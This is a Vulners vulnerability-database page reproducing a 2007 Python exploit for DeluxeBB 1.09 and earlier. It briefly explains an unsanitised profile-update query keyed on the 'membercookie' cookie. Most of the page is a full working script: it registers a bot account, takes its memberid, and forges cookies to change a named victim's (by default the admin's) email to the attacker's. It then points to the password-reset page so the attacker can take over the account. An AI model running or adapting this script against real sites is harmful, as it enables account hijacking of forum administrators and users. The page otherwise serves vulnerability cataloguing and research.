Vulners
Lucene search
DeluxeBB <= 1.09 Remote Admin Email Change Exploit
#!/usr/bin/python
#-*- coding: iso-8859-15 -*-
'''
_ __ _____ _____ _ __
| '_ \ / _ \ \/ / _ \ '_ \
| | | | __/> < __/ | | |
|_| |_|\___/_/\_\___|_| |_|
------------------------------------------------------------------------------------------------
&Acirc;§ DeluxeBB 0day Remote Change Admin's credentials &Acirc;§
------------------------------------------------------------------------------------------------
nexen
------------------------------------------------------------------------------------------------
PoC / Bug Explanation:
When you update your profile,
DeluxeBB execute a vulnerable query:
$db->unbuffered_query("UPDATE ".$prefix."users SET email='$xemail', msn='$xmsn', icq='$xicq', ... WHERE (username='$membercookie')");
So, editing cookie "membercookie" you can change remote user's email.
Enjoy ;)
------------------------------------------------------------------------------------------------
'''
import httplib, urllib, sys, md5
from random import randint
print "\n########################################################################################"
print " DeluxeBB <= 1.09 Remote Admin's/User's Email Change "
print " "
print " Vulnerability Discovered By Nexen "
print " Greetz to The:Paradox that Coded the Exploit. "
print " "
print " Usage: "
print " %s [Target] [VictimNick] [Path] [YourEmail] [AdditionalFlags] " % (sys.argv[0])
print " "
print " Additional Flags: "
print " -id34 -passMypassword -port80 "
print " "
print " Example: "
print " python %s 127.0.0.1 admin /DeluxeBB/ [email protected] -port81 " % (sys.argv[0])
print " "
print "########################################################################################\n"
if len(sys.argv)<=4: sys.exit()
else: print "[.]Exploit Starting."
target = sys.argv[1]
admin_nick = sys.argv[2]
path = sys.argv[3]
real_email = sys.argv[4]
botpass = "the-new-administrator"
rand = randint(1, 99999)
dn1 = 0
dn2 = 0
dn3 = 0
try:
for line in sys.argv[:]:
if line.find('-pass') != -1 and dn1 == 0:
upass = line.split('-pass')[1]
dn1 = 1
elif line.find('-pass') == -1 and dn1 == 0:
upass = ""
if line.find('-id') != -1 and dn2 == 0:
userid = line.split('-id')[1]
dn2 = 1
elif line.find('-id') == -1 and dn2 == 0:
userid = ""
if line.find('-port') != -1 and dn3 == 0:
port = line.split('-port')[1]
dn3 = 1
elif line.find('-port') == -1 and dn3 == 0:
port = "80"
except:
sys.exit("[-]Some error in Additional Flag.")
if upass=="" and userid != "" or userid == "" and upass != "":
print "[-]Bad Additional flags -id -pass given, ignoring them."
upass=""
userid=""
############################################################################################Trying to connect.
try:
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "")
except: sys.exit("[-]Cannot connect. Check Target.")
############################################################################################Registering a new user if id or upass not defined
try:
conn = httplib.HTTPConnection(target,port)
if upass == "" or userid == "":
conn.request("POST", path + "misc.php?sub=register", urllib.urlencode({'submit': 'Register','name': 'th331337.%d' % (rand) , 'pass': botpass,'pass2': botpass,'email': 'root%[email protected]' % (rand) }), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
cookies = response.getheader('set-cookie').split(";")
#print "\n\nth331337.%d \n\nthe-new-administrator" % (rand)
print "[.]Registering a new user. -->",response.status, response.reason
conn.close()
############################################################################################Getting memberid in Cookies
for line in cookies[:]:
if line.find('memberid') != -1:
mid = line.split('memberid=')[1]
############################################################################################Isset like starts
try: mid
except NameError: sys.exit("[-]Can't Get \"memberid\". Failed. Something has gone wrong. If you have not done yet, you may have to register manually and use flags -id -pass")
except AttributeError:
sys.exit("[-]AttributeError Check your Target/path.")
############################################################################################Doing some Md5
if upass=="" or userid=="":
hash = md5.new()
hash.update(botpass)
passmd5 = hash.hexdigest()
else:
hash = md5.new()
hash.update(upass)
passmd5 = hash.hexdigest()
mid = userid
############################################################################################Updating "victim" email in Profile
conn = httplib.HTTPConnection(target,port)
conn.request("POST", path+"cp.php?sub=settings", urllib.urlencode({'submit': 'Update','xemail': real_email}), {"Accept": "text/plain","Cookie": "memberid="+mid+"; membercookie="+admin_nick+";memberpw="+passmd5+";" ,"Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Changing \""+admin_nick+"\" Email With \"" + real_email + "\" -->",response.status, response.reason
conn.close()
print "[+]All Done! Email changed!!!\n\n You can reset \""+admin_nick+"\" password here -> "+target+path+"misc.php?sub=lostpw :D\n\n Have Fun =)\n"
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Nov 2007 00:00Current
7.1High risk
Vulners AI Score7.1